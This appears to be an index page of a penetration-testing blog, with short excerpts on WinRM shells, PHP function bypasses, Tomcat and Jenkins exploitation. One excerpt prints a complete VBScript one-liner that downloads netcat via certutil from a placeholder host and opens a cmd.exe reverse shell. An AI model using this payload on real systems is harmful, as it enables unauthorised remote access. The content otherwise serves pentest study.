Winrm Shell

Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. Source: link If you have obtained the credentials of winrm and you are able to access port 5985/wsman, you … Read more Winrm Shell

Dangerous PHP Functions

I have seen some blog posts regarding the “Bypassing Disable_Functions in PHP” and I decided to dig some more to better understand all of the bypasses around and also focus on how to disable dangerous php functions. Here is the quick summary what you can do with php functions. system : immediately shows all output, … Read more Dangerous PHP Functions

I am admin but can’t perform administrative tasks

While I was working on a project, I noticed a strange behavior. I was an admin user as my user was added in administrator group. However, I was unable to access other users’ folders nor perform such commands “net user test test /add”. I was all the time getting the “Access denied” error. That’s a … Read more I am admin but can’t perform administrative tasks

White Box Testing Tomcat and Struts

Tomcat is always an easy target and low hanging fruit in a pentest and I always aim to scan the network for port 8080 as tomcat runs by default on this port. If you are lucky enough, you can login to the “Manager App” with default credentials and upload a .war file to get shell … Read more White Box Testing Tomcat and Struts

Visual Basic Reverse Shell

VBS reverse shell This little .vbs file will download netcat to the system using certutil.exe and then will give a reverse shell. Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):objShell.Run "cmd/K certutil.exe -urlcache -split -f http://IP/nc.exe C:\users\administrator\Desktop\nc.exe & C:\users\administrator\Desktop\nc.exe -e cmd.exe IP Port":Set objShell = Nothing

White Box Testing Jenkins

I generally install vulnerable web applications to my 64bit Ubuntu 16.04 machine to better understand the structure of the web applications and vulnerabilities. It is more like white-box approach. If you don’t know well about the web application you are auditing, you can easily get familiar with this method. In this post, I am going … Read more White Box Testing Jenkins

Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization

You can often come across with Jenkins Script Console without any authentication.Here you can find the some code execution scripts which can help you to run some commands and even get a reverse shell depending on the Operating System version. Jenkins Code Execution via Script Console Getting Reverse Shell on Linux Machine We can simply … Read more Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization